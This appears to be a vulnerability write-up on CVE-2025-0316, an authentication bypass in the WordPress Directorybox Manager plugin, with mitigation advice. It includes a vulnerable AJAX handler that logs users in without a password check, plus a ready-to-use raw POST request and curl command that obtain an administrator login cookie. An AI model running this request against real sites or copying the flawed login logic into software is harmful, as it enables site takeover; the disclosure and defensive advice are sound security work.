CVE-2025-0316 - Authentication Bypass in WordPress Directorybox Manager Plugin ≤ 2.5 - Full Analysis and Exploit

CVE-2025-0316 is a critical vulnerability affecting the popular Directorybox Manager plugin for WordPress. Versions up to and including 2.5 are impacted. The flaw lets anyone with knowledge of a username – even an unauthenticated attacker – log in as that user (including admins!) due to faulty authentication logic in the wp_dp_enquiry_agent_contact_form_submit_callback function.

If your site uses this plugin, update or disable it immediately.

What is Directorybox Manager?

Directorybox Manager is a directory plugin used on thousands of WordPress websites for managing listings and user submissions. It provides custom post types, forms, and user account functionality.

Where is The Problem?

The authentication bypass occurs in the AJAX handler wp_dp_enquiry_agent_contact_form_submit_callback. This function is used by the plugin's contact forms and contains improper checks for logged-in users.

Vulnerable Code Example

// Inside wp_dp_enquiry_agent_contact_form_submit_callback:

$user = get_user_by('login', sanitize_text_field($_POST['username']));
if ($user) {
    // No password check!
    wp_set_current_user($user->ID);
    wp_set_auth_cookie($user->ID);
    // ...proceed as logged-in user
}

How to Exploit (Proof of Concept)

> Disclaimer:
> This is for educational purposes only. Do not use on live systems you do not own.

Steps an attacker can take

1. Find a username (commonly "admin", or via /?author=1 or public listings).

Send a POST request to WordPress’s AJAX handler as an unauthenticated user

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded

action=wp_dp_enquiry_agent_contact_form_submit_callback&username=admin

After this request:
You’ll be logged in as "admin". The site will set a valid login cookie.

Full Exploit in cURL

curl -i -X POST https://victim.com/wp-admin/admin-ajax.php \
     -d "action=wp_dp_enquiry_agent_contact_form_submit_callback&username=admin"

If successful, the login cookie is returned in the HTTP response.

- You can then access /wp-admin/ as an administrator.

References:

- NVD CVE-2025-0316 entry
- WPScan Advisory
- Plugin's WordPress page

Disable the plugin until a fixed version is released.

- Restrict access to /wp-admin/ via .htaccess or firewall.
- Use plugins like Wordfence or Sucuri to temporarily block suspicious AJAX requests.

Final Thoughts

CVE-2025-0316 is extremely dangerous, especially for high-profile or business websites.

Regularly check for updates.

For admins and developers:
Always validate both username _and_ password, and require a valid nonce for all AJAX handlers.

Useful References

- CVE-2025-0316 NVD Record
- Directorybox Manager Plugin
- How to secure your WordPress site

Timeline

Published on: 02/08/2025 22:15:28 UTC